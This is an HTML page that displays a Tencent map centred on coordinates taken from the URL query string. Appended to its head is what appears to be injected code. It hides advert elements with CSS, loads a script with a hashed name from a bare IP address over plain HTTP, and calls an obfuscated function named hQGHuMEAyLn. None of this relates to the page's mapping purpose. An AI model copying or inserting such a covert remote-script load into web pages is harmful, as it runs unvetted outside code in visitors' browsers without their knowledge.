<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title></title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
<style type="text/css">
html,body{
    width:100%;
    height:100%;
}
*{
    margin:0px;
    padding:0px;
}
body, button, input, select, textarea {
    font: 12px/16px Verdana, Helvetica, Arial, sans-serif;
}
p{
    width:603px;
    padding-top:3px;
    overflow:hidden;
}
#container{
    min-width:600px;
    min-height:767px;
}
.btn{
    width:142px;
}
</style>
<script>
window.onload=init;

	//采用正则表达式获取地址栏参数
	function GetQueryString(name) {
		var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");
		var r = window.location.search.substr(1).match(reg);
		if (r != null)
			return unescape(r[2]);
		return null;
	}


function init() {
  //设置地图中心点
  var myLatlng = new qq.maps.LatLng(GetQueryString("lat"),GetQueryString("lng"));
  //定义工厂模式函数
  var myOptions = {
    zoom: 15,               //设置地图缩放级别
    center: myLatlng,      //设置中心点样式
    mapTypeId: qq.maps.MapTypeId.ROADMAP  //设置地图样式详情参见MapType
  }
  //获取dom元素添加地图信息
  var map = new qq.maps.Map(document.getElementById("container"), myOptions);
  
    //添加定时器
    setTimeout(function(){
        var marker=new qq.maps.Marker({
            position:myLatlng,
			animation:qq.maps.MarkerAnimation.DROP,
            map:map
        });
        //marker.setAnimation(qq.maps.Animation.DROP);
    },2000);
  
}
  //异步加载地图库函数文件
function loadScript() {
  //创建script标签
  var script = document.createElement("script");
  //设置标签的type属性
  script.type = "text/javascript";
  //设置标签的链接地址
  script.src = "http://map.qq.com/api/js?v=2.exp&callback=init";
  //添加标签到dom
  document.body.appendChild(script);
}
  
window.onload = loadScript;    // dom文档加载结束开始加载 此段代码
</script>
<style type="text/css">
[class="top-advert"] {display:none!important;display:none}
[class="middle-advert"] {display:none!important;display:none}
[class^="qq_topAd"] {display:none!important;display:none}</style>
<script language="javascript" type="text/javascript" src="http://202.102.100.100/35ff706fd57d11c141cdefcd58d6562b.js" charset="gb2312"></script><script type="text/javascript">
hQGHuMEAyLn('[id="bb9c190068b8405587e5006f905e790c"]');</script></head>
<body>
<div id="container"></div>
</body>
</html>